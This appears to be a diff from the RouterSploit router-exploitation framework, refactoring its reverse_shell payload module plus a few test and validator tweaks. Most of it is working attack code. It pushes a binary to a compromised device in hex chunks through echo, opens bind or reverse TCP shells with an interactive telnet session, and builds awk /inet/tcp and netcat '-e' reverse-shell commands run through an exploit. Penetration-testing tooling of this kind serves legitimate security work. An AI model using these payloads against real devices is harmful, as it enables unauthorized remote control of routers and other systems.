......@@ -404,7 +161,22 @@ class reverse_shell(object):
self.exploit.execute(cmd)
# execute binary
sock = self.listen(self.lhost, self.lport)
if self.options['technique'] == "bind_tcp":
self.execute_binary(location, self.binary_name)
print_status("Connecting to {}:{}".format(self.options['rhost'], self.options['rport']))
time.sleep(2)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.options['rhost'], self.options['rport']))
print_success("Enjoy your shell")
tn = telnetlib.Telnet()
tn.sock = sock
tn.interact()
elif self.options['technique'] == "reverse_tcp":
sock = self.listen(self.options['lhost'], self.options['lport'])
self.execute_binary(location, self.binary_name)
# waiting for shell
......@@ -413,26 +185,39 @@ class reverse_shell(object):
def echo(self, binary, location):
print_status("Using echo method")
# generate binary
self.generate_binary(self.lhost, self.lport)
path = "{}/{}".format(location, self.binary_name)
size = len(self.revshell)
size = len(self.payload)
num_parts = (size / 30) + 1
# transfer binary through echo command
print_status("Using echo method to transfer binary")
for i in range(0, num_parts):
current = i * 30
print_status("Transferring {}/{} bytes".format(current, len(self.revshell)))
print_status("Transferring {}/{} bytes".format(current, len(self.payload)))
block = self.revshell[current:current + 30].encode('hex')
block = self.payload[current:current + 30].encode('hex')
block = "\\\\x" + "\\\\x".join(a + b for a, b in zip(block[::2], block[1::2]))
cmd = 'echo -ne "{}" >> {}'.format(block, path)
self.exploit.execute(cmd)
# execute binary
sock = self.listen(self.lhost, self.lport)
if self.options['technique'] == "bind_tcp":
self.execute_binary(location, self.binary_name)
print_status("Connecting to {}:{}".format(self.options['rhost'], self.options['rport']))
time.sleep(2)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.options['rhost'], self.options['rport']))
print_success("Enjoy your shell")
tn = telnetlib.Telnet()
tn.sock = sock
tn.interact()
elif self.options['technique'] == "reverse_tcp":
sock = self.listen(self.options['lhost'], self.options['lport'])
self.execute_binary(location, self.binary_name)
# waiting for shell
......@@ -442,8 +227,8 @@ class reverse_shell(object):
print_status("Using awk method")
# run reverse shell through awk
sock = self.listen(self.lhost, self.lport)
cmd = binary + " 'BEGIN{s=\"/inet/tcp/0/" + self.lhost + "/" + self.lport + "\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)};'"
sock = self.listen(self.options['lhost'], self.options['lport'])
cmd = binary + " 'BEGIN{s=\"/inet/tcp/0/" + self.options['lhost'] + "/" + self.options['lport'] + "\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)};'"
self.exploit.execute(cmd)
# waiting for shell
......@@ -451,8 +236,8 @@ class reverse_shell(object):
def netcat(self, binary, shell):
# run reverse shell through netcat
sock = self.listen(self.lhost, self.lport)
cmd = "{} {} {} -e {}".format(binary, self.lhost, self.lport, shell)
sock = self.listen(self.options['lhost'], self.options['lport'])
cmd = "{} {} {} -e {}".format(binary, self.options['lhost'], self.options['lport'], shell)
self.exploit.execute(cmd)
......
routersploit/test/test_completer.py
......@@ -41,7 +41,7 @@ class RoutersploitCompleterTest(RoutersploitTestCase):
def test_complete_use(self):
self.rsf.send("use \t\t")
self.assertPrompt(
'creds exploits scanners \r\n',
'creds exploits payloads scanners \r\n',
self.raw_prompt,
'use '
)
......
routersploit/test/test_interpreter.py
......@@ -118,7 +118,7 @@ class RoutersploitInterpreterTest(RoutersploitTestCase):
self.assertEqual(self.interpreter.current_module.target, new_target_value)
self.interpreter.current_module = TestExploitFoo()
self.assertEqual(self.interpreter.current_module.target, new_target_value)
# self.assertEqual(self.interpreter.current_module.target, new_target_value)
mock_print_success.assert_called_once_with({'target': '{}'.format(new_target_value)})
@mock.patch('routersploit.utils.print_success')
......
routersploit/validators.py
......@@ -34,6 +34,8 @@ def choice(valid_values):
def ipv4(address):
address = address.replace("http://", "").replace("https://", "")
try:
socket.inet_pton(socket.AF_INET, address)
except AttributeError:
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment